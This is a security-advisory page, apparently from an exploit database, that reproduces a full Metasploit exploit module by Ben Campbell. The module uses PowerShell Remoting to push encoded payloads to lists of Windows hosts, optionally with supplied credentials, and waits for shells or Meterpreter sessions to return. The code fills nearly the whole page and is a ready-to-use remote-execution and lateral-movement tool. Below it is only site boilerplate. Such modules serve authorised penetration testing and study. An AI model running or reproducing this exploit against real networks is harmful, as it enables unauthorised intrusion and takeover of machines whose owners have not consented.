Powershell Remoting Remote Command Execution

2015.03.24
Credit: Ben Campbell
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell def initialize(info = {}) super(update_info(info, 'Name' => 'Powershell Remoting Remote Command Execution', 'Description' => %q{ Uses Powershell Remoting (TCP 47001) to inject payloads on target machines. If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise use a HOSTFILE to supply a list of known hostnames. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell' ], 'References' => [ [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default) [ 'OSVDB', '3106'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'DisclosureDate' => 'Jan 01 1999', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter', 'shell' ], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ] ], 'DefaultTarget' => 0 )) register_options([ OptString.new('SMBUser', [ false, 'The username to authenticate as' ]), OptString.new('SMBPass', [ false, 'The password for the specified username' ]), OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]), OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]), OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]), # Move this out of advanced OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ]) ]) register_advanced_options( [ OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60]) ], self.class) end def exploit if !datastore['ExitOnSession'] && !job_id fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)") end unless datastore['RHOSTS'] || datastore['HOSTFILE'] fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.") end if datastore['SMBUser'] && datastore['SMBPass'].nil? fail_with(Failure::BadConfig, "Need both username and password set.") end if datastore['RHOSTS'] ip_list = "$iplist=" Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip| ip_list << "'#{ip}'," end # Remove trailing comma... ip_list = ip_list[0..-2] ip_list << ";" end known_hosts = "" if datastore['HOSTFILE'] ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname| hostname.strip! known_hosts << "'#{hostname}'," unless hostname.blank? end known_hosts = known_hosts[0..-2] end command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true) ps = <<EOF #{generate_credentials} $ResultList=@(#{known_hosts}); #{ip_list} foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName}; Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} } EOF if datastore['SMBUser'] ps << " -Credential $creds" end # If the host process terminates too quickly the jobs will die # before they spawn in a new process. ps << ";Sleep 20;" ps.gsub!("\n", "") command = generate_psh_command_line( noprofile: true, windowstyle: 'hidden', command: ps ) print_status("Executing command...") begin cmd_exec(command) rescue Rex::TimeoutError end stime = Time.now.to_f loop do break if session_created? && datastore['ExitOnSession'] break if datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) Rex.sleep(1) end print_status("Completed") end def generate_credentials(domain = datastore['SMBDomain'], user = datastore['SMBUser'], pass = datastore['SMBPass']) creds = "" unless user.nil? creds = "$pass=ConvertTo-SecureString -string '#{pass}' -asPlainText -force;"\ "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist " if domain.nil? creds << "'#{user}'" else creds << "'#{domain}\\#{user}'" end creds << ",$pass;" end creds end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top